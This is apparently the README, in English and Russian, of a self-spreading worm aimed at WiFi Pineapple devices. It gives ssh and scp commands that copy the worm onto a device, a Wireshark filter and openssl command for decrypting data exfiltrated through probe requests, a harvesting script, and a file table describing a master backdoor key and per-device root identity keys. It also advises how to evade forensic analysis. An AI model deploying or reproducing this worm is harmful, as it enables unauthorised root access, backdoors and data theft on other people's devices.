
A WiFi Pineapple infecting worm.
./build.sh
ssh -oStrictHostKeyChecking=no -oUserKnownHostsFile=/dev/null [email protected] "mkdir /tospo"
scp -oStrictHostKeyChecking=no -oUserKnownHostsFile=/dev/null dist/tv* [email protected]:/tospo/
Примечание: вам понадобится настроенное устройство ИЛИ используйте metasploit-module для включения ssh
фильтр wireshark:
(wlan.fc.type_subtype == 0x04) && (wlan_mgt.tag.length == 32)
printf $(echo "[data copied from wireshark]" | sed -re 's/(..)/\\x\1/g') | openssl rsautl -decrypt -inkey tvd.pem
Опционально можно использовать скрипт harvest.py следующим образом:
python harvest.py [monitor-iface]
| Файл | Назначение |
|---|
| tv | Сам вирус. |
| tvbd | «Главный» бэкдор-ключ, не распространяйте приватный ключ. |
| tvd | Ключ раскрытия, используемый для эксфильтрации данных через probe-запросы. |
| tospo_rsa | Приватный ключ идентичности, уникальный для каждого заражённого устройства, используемый в качестве ключа передачи. |
| tospo_rsa.pub | Публичный ключ идентичности, передаваемый через страницу инъекции команд, чтобы приватная идентичность могла выполнять действия от имени root на удалённом устройстве. |
| w | Переданные параметры беспроводной конфигурации, используемые для восстановления предыдущих подключений. |
| n | Переданные параметры сетевой конфигурации, используемые для восстановления предыдущих подключений. |
| Примечание: Все файлы, начинающиеся с «tv», передаются при заражении нового устройства. Не добавляйте приватные ключи и тому подобное с именами, начинающимися с «tv», иначе ваш приватный ключ будет раскрыт при криминалистическом анализе. |